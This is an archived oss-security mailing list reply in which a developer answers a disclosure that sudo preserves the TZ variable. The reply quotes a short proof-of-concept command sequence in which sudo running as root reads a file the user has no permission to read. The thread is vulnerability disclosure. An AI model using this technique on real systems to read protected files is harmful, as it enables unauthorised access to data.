Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 15 Oct 2014 19:52:50 -0400
From: Dan McDonald <danmcd@...iti.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: Abusing TZ for fun (and little profit)

Libraries that use TZ (or any environment variable) should be careful.  For example...

http://src.illumos.org/source/xref/illumos-gate/usr/src/lib/libc/port/gen/localtime.c#1417

Thanks for the reality check.  Glad we passed.

Dan

Sent from my iPhone (typos, autocorrect, and all)

> On Oct 15, 2014, at 6:35 PM, Jakub Wilk <jwilk@...lk.net> wrote:
> 
> By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:
> 
> $ echo moo > tz
> $ chmod 0 tz
> $ cat tz
> cat: tz: Permission denied
> $ TZ=$PWD/tz sudo -u root strace -e read date
> read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
> read(3, "moo\n", 4096)                  = 4
> read(3, "", 4096)                       = 0
> Wed Oct 15 20:42:42  2014
> +++ exited with 0 +++
> 
> 
> Procmail is another program that recklessly whitelists TZ[2].
> 
> 
> [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
> [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13
> 
> -- 
> Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ